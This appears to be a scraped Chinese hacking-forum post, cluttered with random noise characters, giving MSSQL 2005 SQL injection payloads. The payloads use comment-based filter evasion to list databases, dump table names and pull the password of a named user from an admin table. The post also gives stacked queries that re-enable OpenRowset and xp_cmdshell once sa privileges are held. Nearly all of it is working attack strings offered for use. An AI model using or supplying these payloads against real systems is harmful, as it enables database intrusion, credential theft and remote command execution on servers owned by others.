9 r. A ^" _; K6 n/ `' r4 t& ~" w/ L5 `- J0 r! q5 q, O
+ D5 O; d6 V0 G3 y1 ?% u
[Copy to clipboard]CODE:
: C# w. G$ b9 J \- ^" A/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
. K0 x3 Z* E$ r- N7 E9 d8 m; t! o4 m2 t$ G: C
爆表语句,somedb部份是所要列的数据库,红色数字1累加
( Q8 E( h% N- s% b$ h. z+ Q; u) E
9 N. C) j8 k% r* C* g% h; L8 |1 Y; J* [2 C. d' B( z' }
[Copy to clipboard]CODE:
" q q; f7 P) M# m/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
+ ~5 U+ i) I. W! @, f5 m1 Q5 D5 \5 S6 z8 W+ i# X! E
爆字段语句,爆表admin里user='icerover'的密码段* F t( }9 j6 E8 O4 H: U
& a4 O: j) ]1 a2 W
3 E: Q% V! k' _( k
[Copy to clipboard]CODE:
$ c: T9 J2 ^0 y# a**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--: t) x: M5 Z) X# J/ K
/ S8 W& T) z9 n) F# T
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
+ S0 L! y0 {2 \1 Z- {如果是sa权限,可以这样来开启
- Q# p! l' T8 a5 m) \$ z4 X开启openrowset
3 a1 W% Y1 R$ i& _, ^
# S1 ~6 n% f5 C' G( j4 y
4 u8 n# I7 @+ _+ D1 X% }& O3 ~. X( a; Q[Copy to clipboard]CODE:
6 e. c/ b4 m: w7 _7 G/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--7 f( \ h3 o/ q$ [
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--8 I8 `- s7 ?7 n9 K$ k# Q
4 m9 J; H j$ X/ y, K开启xp_cmdshell
3 L" I8 L% p0 b: B% ~1 b- ~' m0 E+ k5 I6 A8 A- Z
0 ?, z4 s# ]. i0 X[Copy to clipboard]CODE:+ b) x3 Y2 w. `5 t- k* p" k
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--6 `0 F/ r+ h8 C
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
6 t- Y9 K6 }1 o T# t# D% l, Q* r: r7 t0 Z1 c
ok,over~~晚安
9 f; m; ]: R* J6 d$ R |